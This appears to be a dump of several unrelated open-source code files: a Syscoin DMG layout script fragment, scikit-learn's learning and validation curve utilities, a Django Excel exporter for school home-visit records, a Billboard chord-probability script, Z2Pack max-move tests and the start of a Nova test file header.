'backgroundImageAlias': b'\x00\x00\x00\x00\x02\x1e\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd1\x94\\\xb0H+\x00\x05\x00\x00\x00\x98\x0fbackground.tiff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\xd19\xb0\xf8\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\r\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b.background\x00\x00\x10\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x11\x00\x08\x00\x00\xd19\xb0\xf8\x00\x00\x00\x01\x00\x04\x00\x00\x00\x98\x00\x0e\x00 \x00\x0f\x00b\x00a\x00c\x00k\x00g\x00r\x00o\x00u\x00n\x00d\x00.\x00t\x00i\x00f\x00f\x00\x0f\x00\x02\x00\x00\x00\x12\x00\x1c/.background/background.tiff\x00\x14\x01\x06\x00\x00\x00\x00\x01\x06\x00\x02\x00\x00\x0cMacintosh HD\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x97\xab\xc3H+\x00\x00\x01\x88[\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02u\xab\x8d\xd1\x94\\\xb0devrddsk\xff\xff\xff\xff\x00\x00\t \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07syscoin\x00\x00\x10\x00\x08\x00\x00\xce\x97\xab\xc3\x00\x00\x00\x11\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x01\x00\x14\x01\x88[\x88\x00\x16\xa9\t\x00\x08\xfaR\x00\x08\xfaQ\x00\x02d\x8e\x00\x0e\x00\x02\x00\x00\x00\x0f\x00\x1a\x00\x0c\x00M\x00a\x00c\x00i\x00n\x00t\x00o\x00s\x00h\x00 \x00H\x00D\x00\x13\x00\x01/\x00\x00\x15\x00\x02\x00\x14\xff\xff\x00\x00\xff\xff\x00\x00',
'backgroundColorBlue': 1.0,
'iconSize': 96.0,
'backgroundColorGreen': 1.0,
'arrangeBy': 'none',
'showIconPreview': True,
'gridSpacing': 100.0,
'gridOffsetY': 0.0,
'showItemInfo': False,
'labelOnBottom': True,
'backgroundType': 2,
'backgroundColorRed': 1.0
}
alias = Alias.from_bytes(icvp['backgroundImageAlias'])
alias.volume.name = package_name_ns
alias.volume.posix_path = '/Volumes/' + package_name_ns
alias.volume.disk_image_alias.target.filename = package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.carbon_path = 'Macintosh HD:Users:\x00syscoinuser:\x00Documents:\x00syscoin:\x00syscoin:\x00' + package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.posix_path = 'Users/syscoinuser/Documents/syscoin/syscoin/' + package_name_ns + '.temp.dmg'
alias.target.carbon_path = package_name_ns + ':.background:\x00background.tiff'
icvp['backgroundImageAlias'] = biplist.Data(alias.to_bytes())
ds['.']['icvp'] = icvp
ds['.']['vSrn'] = ('long', 1)
ds['Applications']['Iloc'] = (370, 156)
ds['Syscoin-Qt.app']['Iloc'] = (128, 156)
ds.flush()
ds.close()
|
fbagirov/scikit-learn
|
refs/heads/master
|
sklearn/learning_curve.py
|
110
|
"""Utilities to evaluate models with respect to a variable
"""
# Author: Alexander Fabisch <afabisch@informatik.uni-bremen.de>
#
# License: BSD 3 clause
import warnings
import numpy as np
from .base import is_classifier, clone
from .cross_validation import check_cv
from .externals.joblib import Parallel, delayed
from .cross_validation import _safe_split, _score, _fit_and_score
from .metrics.scorer import check_scoring
from .utils import indexable
from .utils.fixes import astype
__all__ = ['learning_curve', 'validation_curve']
def learning_curve(estimator, X, y, train_sizes=np.linspace(0.1, 1.0, 5),
cv=None, scoring=None, exploit_incremental_learning=False,
n_jobs=1, pre_dispatch="all", verbose=0):
"""Learning curve.
Determines cross-validated training and test scores for different training
set sizes.
A cross-validation generator splits the whole dataset k times in training
and test data. Subsets of the training set with varying sizes will be used
to train the estimator and a score for each training subset size and the
test set will be computed. Afterwards, the scores will be averaged over
all k runs for each training subset size.
Read more in the :ref:`User Guide <learning_curves>`.
Parameters
----------
estimator : object type that implements the "fit" and "predict" methods
An object of that type which is cloned for each validation.
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples) or (n_samples, n_features), optional
Target relative to X for classification or regression;
None for unsupervised learning.
train_sizes : array-like, shape (n_ticks,), dtype float or int
Relative or absolute numbers of training examples that will be used to
generate the learning curve. If the dtype is float, it is regarded as a
fraction of the maximum size of the training set (that is determined
by the selected validation method), i.e. it has to be within (0, 1].
Otherwise it is interpreted as absolute sizes of the training sets.
Note that for classification the number of samples usually have to
be big enough to contain at least one sample from each class.
(default: np.linspace(0.1, 1.0, 5))
cv : integer, cross-validation generator, optional
If an integer is passed, it is the number of folds (defaults to 3).
Specific cross-validation objects can be passed, see
sklearn.cross_validation module for the list of possible objects
scoring : string, callable or None, optional, default: None
A string (see model evaluation documentation) or
a scorer callable object / function with signature
``scorer(estimator, X, y)``.
exploit_incremental_learning : boolean, optional, default: False
If the estimator supports incremental learning, this will be
used to speed up fitting for different training set sizes.
n_jobs : integer, optional
Number of jobs to run in parallel (default 1).
pre_dispatch : integer or string, optional
Number of predispatched jobs for parallel execution (default is
all). The option can reduce the allocated memory. The string can
be an expression like '2*n_jobs'.
verbose : integer, optional
Controls the verbosity: the higher, the more messages.
Returns
-------
train_sizes_abs : array, shape = (n_unique_ticks,), dtype int
Numbers of training examples that has been used to generate the
learning curve. Note that the number of ticks might be less
than n_ticks because duplicate entries will be removed.
train_scores : array, shape (n_ticks, n_cv_folds)
Scores on training sets.
test_scores : array, shape (n_ticks, n_cv_folds)
Scores on test set.
Notes
-----
See :ref:`examples/model_selection/plot_learning_curve.py
<example_model_selection_plot_learning_curve.py>`
"""
if exploit_incremental_learning and not hasattr(estimator, "partial_fit"):
raise ValueError("An estimator must support the partial_fit interface "
"to exploit incremental learning")
X, y = indexable(X, y)
# Make a list since we will be iterating multiple times over the folds
cv = list(check_cv(cv, X, y, classifier=is_classifier(estimator)))
scorer = check_scoring(estimator, scoring=scoring)
# HACK as long as boolean indices are allowed in cv generators
if cv[0][0].dtype == bool:
new_cv = []
for i in range(len(cv)):
new_cv.append((np.nonzero(cv[i][0])[0], np.nonzero(cv[i][1])[0]))
cv = new_cv
n_max_training_samples = len(cv[0][0])
# Because the lengths of folds can be significantly different, it is
# not guaranteed that we use all of the available training data when we
# use the first 'n_max_training_samples' samples.
train_sizes_abs = _translate_train_sizes(train_sizes,
n_max_training_samples)
n_unique_ticks = train_sizes_abs.shape[0]
if verbose > 0:
print("[learning_curve] Training set sizes: " + str(train_sizes_abs))
parallel = Parallel(n_jobs=n_jobs, pre_dispatch=pre_dispatch,
verbose=verbose)
if exploit_incremental_learning:
classes = np.unique(y) if is_classifier(estimator) else None
out = parallel(delayed(_incremental_fit_estimator)(
clone(estimator), X, y, classes, train, test, train_sizes_abs,
scorer, verbose) for train, test in cv)
else:
out = parallel(delayed(_fit_and_score)(
clone(estimator), X, y, scorer, train[:n_train_samples], test,
verbose, parameters=None, fit_params=None, return_train_score=True)
for train, test in cv for n_train_samples in train_sizes_abs)
out = np.array(out)[:, :2]
n_cv_folds = out.shape[0] // n_unique_ticks
out = out.reshape(n_cv_folds, n_unique_ticks, 2)
out = np.asarray(out).transpose((2, 1, 0))
return train_sizes_abs, out[0], out[1]
def _translate_train_sizes(train_sizes, n_max_training_samples):
"""Determine absolute sizes of training subsets and validate 'train_sizes'.
Examples:
_translate_train_sizes([0.5, 1.0], 10) -> [5, 10]
_translate_train_sizes([5, 10], 10) -> [5, 10]
Parameters
----------
train_sizes : array-like, shape (n_ticks,), dtype float or int
Numbers of training examples that will be used to generate the
learning curve. If the dtype is float, it is regarded as a
fraction of 'n_max_training_samples', i.e. it has to be within (0, 1].
n_max_training_samples : int
Maximum number of training samples (upper bound of 'train_sizes').
Returns
-------
train_sizes_abs : array, shape (n_unique_ticks,), dtype int
Numbers of training examples that will be used to generate the
learning curve. Note that the number of ticks might be less
than n_ticks because duplicate entries will be removed.
"""
train_sizes_abs = np.asarray(train_sizes)
n_ticks = train_sizes_abs.shape[0]
n_min_required_samples = np.min(train_sizes_abs)
n_max_required_samples = np.max(train_sizes_abs)
if np.issubdtype(train_sizes_abs.dtype, np.float):
if n_min_required_samples <= 0.0 or n_max_required_samples > 1.0:
raise ValueError("train_sizes has been interpreted as fractions "
"of the maximum number of training samples and "
"must be within (0, 1], but is within [%f, %f]."
% (n_min_required_samples,
n_max_required_samples))
train_sizes_abs = astype(train_sizes_abs * n_max_training_samples,
dtype=np.int, copy=False)
train_sizes_abs = np.clip(train_sizes_abs, 1,
n_max_training_samples)
else:
if (n_min_required_samples <= 0 or
n_max_required_samples > n_max_training_samples):
raise ValueError("train_sizes has been interpreted as absolute "
"numbers of training samples and must be within "
"(0, %d], but is within [%d, %d]."
% (n_max_training_samples,
n_min_required_samples,
n_max_required_samples))
train_sizes_abs = np.unique(train_sizes_abs)
if n_ticks > train_sizes_abs.shape[0]:
warnings.warn("Removed duplicate entries from 'train_sizes'. Number "
"of ticks will be less than than the size of "
"'train_sizes' %d instead of %d)."
% (train_sizes_abs.shape[0], n_ticks), RuntimeWarning)
return train_sizes_abs
def _incremental_fit_estimator(estimator, X, y, classes, train, test,
train_sizes, scorer, verbose):
"""Train estimator on training subsets incrementally and compute scores."""
train_scores, test_scores = [], []
partitions = zip(train_sizes, np.split(train, train_sizes)[:-1])
for n_train_samples, partial_train in partitions:
train_subset = train[:n_train_samples]
X_train, y_train = _safe_split(estimator, X, y, train_subset)
X_partial_train, y_partial_train = _safe_split(estimator, X, y,
partial_train)
X_test, y_test = _safe_split(estimator, X, y, test, train_subset)
if y_partial_train is None:
estimator.partial_fit(X_partial_train, classes=classes)
else:
estimator.partial_fit(X_partial_train, y_partial_train,
classes=classes)
train_scores.append(_score(estimator, X_train, y_train, scorer))
test_scores.append(_score(estimator, X_test, y_test, scorer))
return np.array((train_scores, test_scores)).T
def validation_curve(estimator, X, y, param_name, param_range, cv=None,
scoring=None, n_jobs=1, pre_dispatch="all", verbose=0):
"""Validation curve.
Determine training and test scores for varying parameter values.
Compute scores for an estimator with different values of a specified
parameter. This is similar to grid search with one parameter. However, this
will also compute training scores and is merely a utility for plotting the
results.
Read more in the :ref:`User Guide <validation_curve>`.
Parameters
----------
estimator : object type that implements the "fit" and "predict" methods
An object of that type which is cloned for each validation.
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples) or (n_samples, n_features), optional
Target relative to X for classification or regression;
None for unsupervised learning.
param_name : string
Name of the parameter that will be varied.
param_range : array-like, shape (n_values,)
The values of the parameter that will be evaluated.
cv : integer, cross-validation generator, optional
If an integer is passed, it is the number of folds (defaults to 3).
Specific cross-validation objects can be passed, see
sklearn.cross_validation module for the list of possible objects
scoring : string, callable or None, optional, default: None
A string (see model evaluation documentation) or
a scorer callable object / function with signature
``scorer(estimator, X, y)``.
n_jobs : integer, optional
Number of jobs to run in parallel (default 1).
pre_dispatch : integer or string, optional
Number of predispatched jobs for parallel execution (default is
all). The option can reduce the allocated memory. The string can
be an expression like '2*n_jobs'.
verbose : integer, optional
Controls the verbosity: the higher, the more messages.
Returns
-------
train_scores : array, shape (n_ticks, n_cv_folds)
Scores on training sets.
test_scores : array, shape (n_ticks, n_cv_folds)
Scores on test set.
Notes
-----
See
:ref:`examples/model_selection/plot_validation_curve.py
<example_model_selection_plot_validation_curve.py>`
"""
X, y = indexable(X, y)
cv = check_cv(cv, X, y, classifier=is_classifier(estimator))
scorer = check_scoring(estimator, scoring=scoring)
parallel = Parallel(n_jobs=n_jobs, pre_dispatch=pre_dispatch,
verbose=verbose)
out = parallel(delayed(_fit_and_score)(
estimator, X, y, scorer, train, test, verbose,
parameters={param_name: v}, fit_params=None, return_train_score=True)
for train, test in cv for v in param_range)
out = np.asarray(out)[:, :2]
n_params = len(param_range)
n_cv_folds = out.shape[0] // n_params
out = out.reshape(n_cv_folds, n_params, 2).transpose((2, 1, 0))
return out[0], out[1]
|
koebbe/homeworks
|
refs/heads/master
|
visit/export_poc.py
|
1
|
#!/usr/bin/env python
import datetime
import os
from openpyxl import Workbook
from openpyxl.cell import get_column_letter
from openpyxl.comments import Comment
from openpyxl.styles import PatternFill, Border, Side, Alignment, Protection, Font
import xlsxwriter
import django
django.setup()
from django.db.models import Q
import tempfile
from visit import models
from qa import models as qamodels
#build a list of slugs for each visit 'type'. this will be used in build_cols
def build_visit_cols():
return {
'id': { 'type': 'visit', 'title': 'Visit ID', 'attr': 'id'},
'school': { 'type': 'visit', 'title': 'School', 'attr': 'student.school.name'},
'program_model': { 'type': 'visit', 'title': 'Program Model', 'attr': 'student.school.get_program_model_display()'},
'staff1': { 'type': 'visit', 'title': 'Staff 1', 'attr': 'staff1.name'},
'staff1-position': { 'type': 'visit', 'title': 'Staff 1 Position', 'attr': 'staff1.position'},
'staff2': { 'type': 'visit', 'title': 'Staff 2', 'attr': 'staff2.name'},
'staff2-position': { 'type': 'visit', 'title': 'Staff 2 Position', 'attr': 'staff2.position'},
'student-first-name': { 'type': 'visit', 'title': 'Student First Name', 'attr': 'student.first_name'},
'student-last-name': { 'type': 'visit', 'title': 'Student Last Name', 'attr': 'student.last_name'},
'submit-date': { 'type': 'visit', 'title': 'Submit Date', 'attr': 'date_submitted'},
'grade': { 'type': 'visit', 'title': ' Grade', 'attr': 'student.grade'},
'district-id': { 'type': 'visit', 'title': 'District ID', 'attr': 'student.student_id'},
'gender': { 'type': 'visit', 'title': 'Gender', 'attr': 'student.gender'},
'racial-identity': { 'type': 'visit', 'title': 'Racial Identity ', 'attr': 'student.racial_identity'},
}
def build_cols(questionset):
cols = {}
for q in questionset.questions.all(): #.filter(is_custom=False):
if q.is_custom: continue
if q.type == 'choices' and q.choices.count() > 2:
for c in q.choices.all():
cols['%s__%d' % (q.slug, c.id)] = { 'type': q.type, 'title': "%s: %s" % (q.slug, c.title) }
elif q.type == 'choices-detail' and q.choices.count() > 2:
for c in q.choices.all():
cols['%s__%d__bool' % (q.slug, c.id)] = { 'type': q.type, 'title': "%s: %s" % (q.slug, c.title) }
cols['%s__%d__detail' % (q.slug, c.id)] = { 'type': q.type, 'title': "Improvement in %s" % (c.title) }
else:
cols[q.slug] = { 'type': 'question', 'title': q.name , 'comment': q.explanation }
return cols
def build_adict():
adict = {}
for a in qamodels.Answer.objects.all().select_related('question','answerset__visit').prefetch_related('selections', 'selections__questionchoice'):
if not hasattr(a.answerset, 'visit'): continue
if a.answerset.visit.id not in adict:
adict[a.answerset.visit.id] = {}
if a.question.slug not in adict[a.answerset.visit.id]:
adict[a.answerset.visit.id][a.question.slug] = a
return adict
def build_sdict():
sdict = {}
v = 'answer__answerset__visit'
slug = 'questionchoice__question__slug'
qc = 'questionchoice__id'
selections = qamodels.Selection.objects.all().values(qc, 'text', 'id', 'answer_id', 'answer__answerset', v, 'questionchoice__is_freeform', slug)
for s in selections:
if s[v] not in sdict:
sdict[s[v]] = {}
if s[slug] not in sdict[s[v]]:
sdict[s[v]][s[slug]] = {}
if s[qc] not in sdict[s[v]][s[slug]]:
sdict[s[v]][s[slug]][s[qc]] = s
return sdict
def get_value(cols, field, visit, S_DICT, A_DICT):
if cols[field]['type'] == 'choices-detail':
q_slug,c_id,typ = field.split('__')
if typ == 'bool':
try:
if 'text' in S_DICT[visit.id][q_slug][int(c_id)]:
pass
return 'Yes'
except KeyError:
# It was not selected as something that needs to be reported on
return "No"
elif typ == 'detail':
try:
return S_DICT[visit.id][q_slug][int(c_id)]['text']
except KeyError:
# It was not selected as something that needs to be reported on so don't report anything
return ""
if cols[field]['type'] == 'choices':
q_slug,c_id = field.split('__')
try:
#selection = visit.answerset.answers.get(question__slug=q_slug).selections.get(questionchoice_id=int(c_id))
#if selection.questionchoice.is_freeform:
if S_DICT[visit.id][q_slug][int(c_id)]['questionchoice__is_freeform']:
return S_DICT[visit.id][q_slug][int(c_id)]['text']
#return selection.text
else:
return "Yes" #selection.get_value()
except:
return "No"
if cols[field]['type'] == 'question':
try:
if field not in A_DICT[visit.id]:
return ""
answer = A_DICT[visit.id][field] #visit.answerset.answers.get(question__slug=field)
#answer = visit.answerset.answers.get(question__slug=field)
v = answer.get_str()
return v
except qamodels.Answer.DoesNotExist:
return ""
elif cols[field]['type'] == 'visit':
try:
return eval("visit.%s" % cols[field]['attr'])
except:
return ""
else:
return "TODO"
def get_or_create_worksheet(wb, v, cols, fields):
if v.answerset.questionset.title not in wb.sheetnames:
ws = wb.create_sheet(title=v.answerset.questionset.title)
for i,f in enumerate(fields):
c = ws.cell(row=1, column=i+1)
c.value = cols[f]['title']
if ws.column_dimensions[get_column_letter(i+1)].width < len(str(c.value)):
ws.column_dimensions[get_column_letter(i+1)].width = len(str(c.value))
if cols[f].get('comment', ''):
c.comment = Comment(cols[f]['comment'], 'Portal')
c.fill = PatternFill(fill_type='lightGray') #, fgColor='FFdddddd')
else:
ws = wb[v.answerset.questionset.title]
return ws
def make_row_from_cols(ws, fields, cols, S_DICT, A_DICT, visit=None, row=0, headers=False, formats=None):
for i, f in enumerate(fields):
value = ""
#c = ws.cell(row=row, column=i+1)
if headers:
if cols[f]['type'] == 'choices':
value = cols[f]['title']
else:
value = cols[f]['title']
#c.fill = PatternFill(fill_type='lightGray') #, fgColor='FFdddddd')
#if cols[f].get('comment', None):
# c.comment = Comment(cols[f]['comment'], 'Portal')
else:
value = get_value(cols, f, visit, S_DICT, A_DICT)
#if ws.column_dimensions[get_column_letter(i+1)].width < len(str(c.value)):
# ws.column_dimensions[get_column_letter(i+1)].width = len(str(c.value))
if isinstance(value, datetime.datetime):
ws.write(row, i, value, formats['datetime'])
elif isinstance(value, datetime.date):
ws.write(row, i, value, formats['date'])
elif isinstance(value, datetime.time):
ws.write(row, i, value, formats['time'])
else:
ws.write(row, i, value)
def make_row(ws, cols, row=1, headers=False):
for i, f in enumerate(cols):
c = ws.cell(row=row, column=i+1)
c.value = f
if ws.column_dimensions[get_column_letter(i+1)].width < len(str(c.value)):
ws.column_dimensions[get_column_letter(i+1)].width = len(str(c.value))
if headers:
c.fill = PatternFill(fill_type='lightGray') #, fgColor='FFdddddd')
def student_visits_xls(schools, date_begin, date_end):
wb = Workbook()
wb.remove_sheet(wb.active)
worksheets = {}
ws = wb.create_sheet(title="Student Visists")
make_row(ws, ["Student Name", "School", "First Staff", "Second Staff", "Visit Status", "Visit Date", "Visit #", "Visit ID",], headers=True)
q = Q(staff1__school__in=set(schools)) | Q(staff1__secondary_schools__in=set(schools))
row = 2
#for v in models.Visit.objects.filter(q).filter(is_submitted=True).filter(date_submitted__range=(date_begin, date_end)).order_by('student__school', 'student').distinct():
current_school = None
for v in models.Visit.objects.filter(q).filter(is_submitted=True).order_by('student__school', 'student').distinct():
if current_school is None:
total_complete = 0
total_noshow = 0
elif current_school != v.student.school.name:
make_row(ws, ["Total Completed Visits", total_complete], row)
make_row(ws, ["Total No-Show Visits", total_noshow], row+1)
row += 2
total_complete = 0
total_noshow = 0
current_school = v.student.school.name
if v.type == 'complete':
total_complete += 1
elif v.type == 'noshow':
total_noshow += 1
if v.type == 'contact_attempt':
date = v.date_submitted
else:
date = v.answerset.answers.get(question__slug='visit-date').get_value()
if date < date_begin or date > date_end: continue
if 'First' in v.answerset.questionset.title:
vn = 1
elif 'Second' in v.answerset.questionset.title:
vn = 2
else:
vn = "Unknown"
if v.staff2:
staff2 = v.staff2.name
else:
staff2 = None
make_row(ws, [v.student.name, v.student.school.name, v.staff1.name, staff2, v.type, date.strftime("%m-%d-%Y"), vn, v.id ], row=row)
row += 1
make_row(ws, ["Total Completed Visits", total_complete], row)
make_row(ws, ["Total No-Show Visits", total_noshow], row+1)
tmpfile = tempfile.mkstemp()[1]
wb.save(tmpfile)
fobj = open(tmpfile)
os.unlink(tmpfile)
return fobj
def payroll(schools, date_begin, date_end):
wb = Workbook()
wb.remove_sheet(wb.active)
worksheets = {}
ws = wb.create_sheet(title="Payroll")
make_row(ws, ["Staff Name", "Student Name", "School", "Visit Status", "Visit Date", "Visit #", "Visit ID", "Total Complete", "Total Incomplete"], headers=True)
q = Q(school__in=schools) | Q(secondary_schools__in=schools)
staff = list(models.Staff.objects.filter(q).distinct())
row=2
for s in set(staff):
total_complete = 0
total_noshow = 0
for v in s.all_visits().filter(is_submitted=True).exclude(type='contact_attempt'): #.filter(date_submitted__range=(date_begin, date_end)):
visit_date = v.answerset.answers.get(question__slug='visit-date').get_value()
if visit_date < date_begin or visit_date > date_end: continue
if v.type == 'complete':
total_complete += 1
elif v.type == 'noshow':
total_noshow += 1
if 'First' in v.answerset.questionset.title:
vn = 1
elif 'Second' in v.answerset.questionset.title:
vn = 2
else:
vn = "Unknown"
make_row(ws, [s.name, v.student.name, v.student.school.name, v.type, visit_date.strftime("%m-%d-%Y"), vn, v.id ], row=row)
row += 1
else:
if total_complete > 0 or total_noshow > 0:
make_row(ws, [s.name,'','','','','', '', total_complete, total_noshow], row=row)
row += 1
tmpfile = tempfile.mkstemp()[1]
wb.save(tmpfile)
fobj = open(tmpfile)
os.unlink(tmpfile)
return fobj
def data_directory_xls():
wb = Workbook()
wb.remove_sheet(wb.active)
ws = wb.create_sheet(title="Data Directory")
make_row(ws, ["District", "School", "Staff Last Name", "Staff First Name", "Staff Email", "Student ID", "Student Last Name", "Student First Name", "Manually Entered", "Grade", "Gender", "Ethnicity"], headers=True)
row=2
for staff in models.Staff.objects.all().order_by('school'):
if staff.students.all().count() == 0:
make_row(ws, [staff.school.district.name, staff.school.name, staff.last_name, staff.first_name, staff.email, '', '', '', '', '', '', ''], row=row)
row += 1
else:
for stu in staff.students.all():
make_row(ws, [stu.school.district.name, stu.school.name, staff.last_name, staff.first_name, staff.email, stu.student_id, stu.last_name, stu.first_name, stu.manually_added, stu.grade, stu.gender, stu.racial_identity], row=row)
row += 1
tmpfile = tempfile.mkstemp()[1]
wb.save(tmpfile)
fobj = open(tmpfile)
os.unlink(tmpfile)
return fobj
field_cache = {}
def build_fields(visit):
if visit.answerset.questionset.id not in field_cache:
fields = [
'id',
'submit-date',
'school',
'program_model',
'staff1',
'staff1-position',
'staff2',
'staff2-position',
]
for q in visit.answerset.questionset.questions.all(): #filter(is_custom=False):
if q.is_custom: continue
if q.type == 'choices' and q.choices.count() > 2:
for c in q.choices.all():
fields.append('%s__%d' % (q.slug, c.id))
elif q.type == 'choices-detail' and q.choices.count() > 2:
for c in q.choices.all():
fields.append('%s__%d__bool' % (q.slug, c.id))
fields.append('%s__%d__detail' % (q.slug, c.id))
else:
fields.append(q.slug)
field_cache[visit.answerset.questionset.id] = fields
return field_cache[visit.answerset.questionset.id]
def admin_report_xls():
S_DICT = build_sdict()
A_DICT = build_adict()
visits = models.Visit.objects.filter(is_submitted=True).select_related('answerset__questionset').prefetch_related('answerset__questionset')
#wb = Workbook()
#wb.remove_sheet(wb.active)
tmpfile = tempfile.mkstemp()[1]
wb = xlsxwriter.Workbook(tmpfile, {'constant_memory': True})
formats = {}
formats['date'] = wb.add_format({'num_format': 'mm/dd/yyyy'})
formats['datetime'] = wb.add_format({'num_format': 'mm/dd/yyyy hh:mm AM/PM'})
formats['time'] = wb.add_format({'num_format': 'hh:mm AM/PM'})
wsd = {}
for i,v in enumerate(visits):
cols = build_cols(v.answerset.questionset)
cols.update(build_visit_cols())
fields = build_fields(v)
title = v.answerset.questionset.title
if title not in wsd:
#if v.answerset.questionset.title not in wb.sheetnames:
ws = wb.add_worksheet(title)
wsd[title] = { 'row': 0, 'ws': ws }
#ws = wb.create_sheet(title=v.answerset.questionset.title)
make_row_from_cols(ws, fields, cols, S_DICT, A_DICT, headers=True, formats=formats)
wsd[title]['row'] += 1
else:
ws = wsd[title]['ws']
make_row_from_cols(ws, fields, cols, S_DICT, A_DICT, visit=v, row=wsd[title]['row'], formats=formats)
wsd[title]['row'] += 1
#wb.save(tmpfile)
wb.close()
fobj = open(tmpfile)
os.unlink(tmpfile)
return fobj
|
corpusmusic/billboardcorpus
|
refs/heads/master
|
4Bars_0thPower.py
|
1
|
from __future__ import division
from collections import defaultdict
from operator import itemgetter
from readdata import read_data
import csv
import sys
RN = ['I', 'bII', 'II', 'bIII', 'III', 'IV', 'bV', 'V', 'bVI', 'VI', 'bVII', 'VII', 'NonHarmonic']
for j in range(0,4):
z = ['4','4','4','4']
t = ['1','2','3','4']
def transition_probs_by_song(chord_lists):
"""
Return a dictionary where the keys are song names, and the values are
dictionaries with transitional probabilities.
"""
chord_counts = defaultdict(lambda: 0)
transition_counts = defaultdict(lambda: 0)
song_transition_probs = {}
total_counts = 0
# for every song in the corpus, 'chords' will be a list of the chords
for chords in chord_lists:
length = len(chords)
# for every chord in the list of chords, count all the transitions and root occurances
for i in range(length-1):
if((chords[i]['bars_per_phrase'] == z[j]) and (chords[i]['bar_of_phrase'] == t[j])):
transition = (chords[i]['root'])
transition_counts[transition] += 1
chord_counts[chords[i]['root']] += 1
total_counts += 1
# add the transition probabilities for this song into a giant dictionary
song_transition_probs[chords[i]['song_name']] = get_transition_probs(total_counts, transition_counts)
# reset the count dictionaries for the next song
chord_counts = defaultdict(lambda: 0)
transition_counts = defaultdict(lambda: 0)
total_counts = 0
return song_transition_probs
def get_transition_probs(total_counts, transition_counts):
"""
Returns a dictionary of transition probabilities based on counts for chords
and transitions.
"""
probs = {}
# go through all 144 possible transitions
for first in RN:
# use try catch to avoid divide by 0 errors or key errors
try:
probability = transition_counts[(first)] / total_counts
probs[(first)] = probability
# if a transition isn't found in the data, give it probability 0
except:
probs[(first)] = 0
return probs
def write_csv(probabilities):
with open('output0th%.csv', 'a') as csvfile:
writer = csv.writer(csvfile, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
for song_name, probs in transition_probs.items():
# get all probabilities in sorted order, and get rid of non-harmonic transitions
transitions = [(RN.index(c1)) for c1 in probs if c1 != 'NonHarmonic']
line = [probs[(RN[c1])] for c1 in sorted(transitions)]
# uncomment the following line to add the song name as the first value in the csv
line = [song_name] + line
# write to csv
writer.writerow(line)
if __name__ == '__main__':
try:
datafile = sys.argv[1]
except:
datafile = 'AlldataWithNonHarmonics.csv'
data = read_data(datafile)
transition_probs = transition_probs_by_song(data)
write_csv(transition_probs)
for song_name, probs in transition_probs.items():
print song_name + '\n' + ('-' * len(song_name)) + 'Bar Phrase ' + t[j] + ' of ' + z[j]
# map roman numerals to integers for sorting, and covert back to display
# this isn't actually necessary, just makes printing the results look nicer
transitions = [(RN.index(c1)) for c1 in probs]
for c1 in sorted(transitions):
probability = probs[(RN[c1])]
if probability != 0:
print '({} ->): {:.4f}'.format(RN[c1], probability)
print #newline
|
Z2PackDev/Z2Pack
|
refs/heads/dev/current
|
tests/test_max_move.py
|
1
|
"""
Test the function that computes the maximum move between two sets of WCC.
"""
# pylint: disable=redefined-outer-name
import copy
import random
random.seed(2512351)
import pytest
import numpy as np
import z2pack
max_move = z2pack._utils._get_max_move # pylint: disable=protected-access,invalid-name
@pytest.fixture(params=range(2, 300, 3))
def num_wcc(request):
return request.param
EPSILON = 1e-14
def test_zero(num_wcc):
"""
Test that the maximum move is zero for two identical sets of WCC.
"""
wcc_1 = [random.random() for _ in range(num_wcc)]
assert max_move(wcc_1, wcc_1) == 0
assert max_move(wcc_1, copy.deepcopy(wcc_1)) == 0
def test_single_move(num_wcc):
"""
Test maximum move for a uniform shift on randomly distributed WCC.
"""
wcc_1 = [random.random() for _ in range(num_wcc)]
wcc_2 = copy.deepcopy(wcc_1)
move = random.uniform(-1, 1) / num_wcc
idx = random.randint(0, num_wcc - 1)
wcc_2[idx] += move
wcc_2[idx] %= 1
assert max_move(wcc_1, wcc_2) <= abs(move) + EPSILON
def test_single_move_equal_spacing(num_wcc):
"""
Test maximum move of a uniform shift on equally spaced WCC.
"""
wcc_1 = list(np.linspace(0, 1, num_wcc, endpoint=False))
wcc_2 = copy.deepcopy(wcc_1)
move = random.uniform(-1, 1) / num_wcc
idx = random.randint(0, num_wcc - 1)
wcc_2[idx] += move
wcc_2[idx] %= 1
assert (
abs(move) - EPSILON <= max_move(wcc_1, wcc_2) <= abs(move) + EPSILON
)
def test_move_all(num_wcc):
"""
Test a random move on all WCC.
"""
wcc_1 = [random.random() for _ in range(num_wcc)]
wcc_2 = copy.deepcopy(wcc_1)
real_max_move = 0
for idx in range(num_wcc):
move = random.uniform(-1, 1) / (2 * num_wcc)
real_max_move = max(abs(move), real_max_move)
wcc_2[idx] += move
wcc_2[idx] %= 1
assert max_move(wcc_1, wcc_2) <= abs(real_max_move) + EPSILON
|
CCI-MOC/nova
|
refs/heads/k2k-liberty
|
nova/tests/functional/api_sample_tests/test_cells.py
|
17
|
# Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
